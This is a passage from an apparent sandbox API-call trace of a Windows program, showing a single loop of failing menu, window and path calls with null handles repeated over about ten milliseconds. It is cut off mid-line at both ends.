| out: pszPath=0x0) returned 0 [0027.468] PathFileExistsW (pszPath=0x0) returned 0 [0027.468] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.468] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.468] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.469] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.469] GetMenu (hWnd=0x0) returned 0x0 [0027.469] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.469] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.469] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.469] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.469] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.469] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.469] GetStockObject (i=6) returned 0x1b00018 [0027.469] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.469] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.469] PathFileExistsW (pszPath=0x0) returned 0 [0027.469] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.469] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.469] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.469] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.469] GetMenu (hWnd=0x0) returned 0x0 [0027.469] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0027.469] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.469] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.469] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.469] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.469] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.469] GetStockObject (i=6) returned 0x1b00018 [0027.469] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.469] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.469] PathFileExistsW (pszPath=0x0) returned 0 [0027.469] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.469] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.469] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.469] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.469] GetMenu (hWnd=0x0) returned 0x0 [0027.470] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.470] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.470] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.470] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.470] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.470] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.470] GetStockObject (i=6) returned 0x1b00018 [0027.470] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.470] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.470] PathFileExistsW (pszPath=0x0) returned 0 [0027.470] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.470] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.470] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.470] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.470] GetMenu (hWnd=0x0) returned 0x0 [0027.470] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.470] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.470] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.470] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.470] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.470] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.470] GetStockObject (i=6) returned 0x1b00018 [0027.470] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.470] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.470] PathFileExistsW (pszPath=0x0) returned 0 [0027.470] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.470] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.470] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.470] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.470] GetMenu (hWnd=0x0) returned 0x0 [0027.470] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.470] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.471] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.471] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.471] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.471] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.471] GetStockObject (i=6) returned 0x1b00018 [0027.471] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.471] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.471] PathFileExistsW (pszPath=0x0) returned 0 [0027.471] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.471] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.471] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.471] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.471] GetMenu (hWnd=0x0) returned 0x0 [0027.471] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.471] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.471] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.471] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.471] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.471] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.471] GetStockObject (i=6) returned 0x1b00018 [0027.471] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.471] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.471] PathFileExistsW (pszPath=0x0) returned 0 [0027.471] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.471] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.471] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.471] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.471] GetMenu (hWnd=0x0) returned 0x0 [0027.471] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x511) returned -1 [0027.471] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.471] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.471] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.471] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.472] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.472] GetStockObject (i=6) returned 0x1b00018 [0027.472] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.472] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.472] PathFileExistsW (pszPath=0x0) returned 0 [0027.472] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.472] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.472] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.472] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.472] GetMenu (hWnd=0x0) returned 0x0 [0027.472] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.472] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.472] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.472] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.472] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.472] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.472] GetStockObject (i=6) returned 0x1b00018 [0027.472] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.472] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.472] PathFileExistsW (pszPath=0x0) returned 0 [0027.472] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.472] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.472] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.472] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.472] GetMenu (hWnd=0x0) returned 0x0 [0027.472] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.472] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.472] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.472] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.472] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.472] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.472] GetStockObject (i=6) returned 0x1b00018 [0027.473] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.473] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.473] PathFileExistsW (pszPath=0x0) returned 0 [0027.473] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.473] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.473] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.473] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.473] GetMenu (hWnd=0x0) returned 0x0 [0027.473] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.473] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.473] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.473] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.473] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.473] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.473] GetStockObject (i=6) returned 0x1b00018 [0027.473] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.473] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.473] PathFileExistsW (pszPath=0x0) returned 0 [0027.473] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.473] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.473] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.473] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.473] GetMenu (hWnd=0x0) returned 0x0 [0027.473] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.473] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.473] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.473] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.473] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.473] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.473] GetStockObject (i=6) returned 0x1b00018 [0027.473] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.473] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.473] PathFileExistsW (pszPath=0x0) returned 0 [0027.474] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.474] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.474] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.474] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.474] GetMenu (hWnd=0x0) returned 0x0 [0027.474] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x12f) returned -1 [0027.474] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.474] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.474] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.474] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.474] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.474] GetStockObject (i=6) returned 0x1b00018 [0027.474] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.474] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.474] PathFileExistsW (pszPath=0x0) returned 0 [0027.474] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.474] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.474] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.474] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.474] GetMenu (hWnd=0x0) returned 0x0 [0027.474] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.474] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.474] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.474] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.474] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.474] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.474] GetStockObject (i=6) returned 0x1b00018 [0027.474] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.474] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.474] PathFileExistsW (pszPath=0x0) returned 0 [0027.474] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.474] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.475] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.475] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.475] GetMenu (hWnd=0x0) returned 0x0 [0027.475] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.475] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.475] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.475] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.475] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.475] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.475] GetStockObject (i=6) returned 0x1b00018 [0027.475] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.475] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.475] PathFileExistsW (pszPath=0x0) returned 0 [0027.475] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.475] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.475] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.475] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.475] GetMenu (hWnd=0x0) returned 0x0 [0027.475] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.475] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.475] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.475] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.475] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.475] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.475] GetStockObject (i=6) returned 0x1b00018 [0027.475] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.475] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.475] PathFileExistsW (pszPath=0x0) returned 0 [0027.475] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.475] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.475] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.475] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.475] GetMenu (hWnd=0x0) returned 0x0 [0027.476] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.476] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.476] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.476] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.476] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.476] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.476] GetStockObject (i=6) returned 0x1b00018 [0027.476] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.476] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.476] PathFileExistsW (pszPath=0x0) returned 0 [0027.476] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.476] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.476] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.476] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.476] GetMenu (hWnd=0x0) returned 0x0 [0027.476] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x211) returned -1 [0027.476] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.476] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.476] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.476] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.476] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.476] GetStockObject (i=6) returned 0x1b00018 [0027.476] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.476] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.476] PathFileExistsW (pszPath=0x0) returned 0 [0027.476] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.476] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.476] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.476] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.476] GetMenu (hWnd=0x0) returned 0x0 [0027.476] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.477] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.477] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.477] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.477] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.477] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.477] GetStockObject (i=6) returned 0x1b00018 [0027.477] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.477] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.477] PathFileExistsW (pszPath=0x0) returned 0 [0027.477] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.477] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.477] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.477] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.477] GetMenu (hWnd=0x0) returned 0x0 [0027.477] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.477] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.477] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.477] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.477] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.477] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.477] GetStockObject (i=6) returned 0x1b00018 [0027.477] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.477] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.477] PathFileExistsW (pszPath=0x0) returned 0 [0027.477] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.477] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.477] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.477] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.477] GetMenu (hWnd=0x0) returned 0x0 [0027.477] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.477] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.477] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.477] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.478] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.478] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, 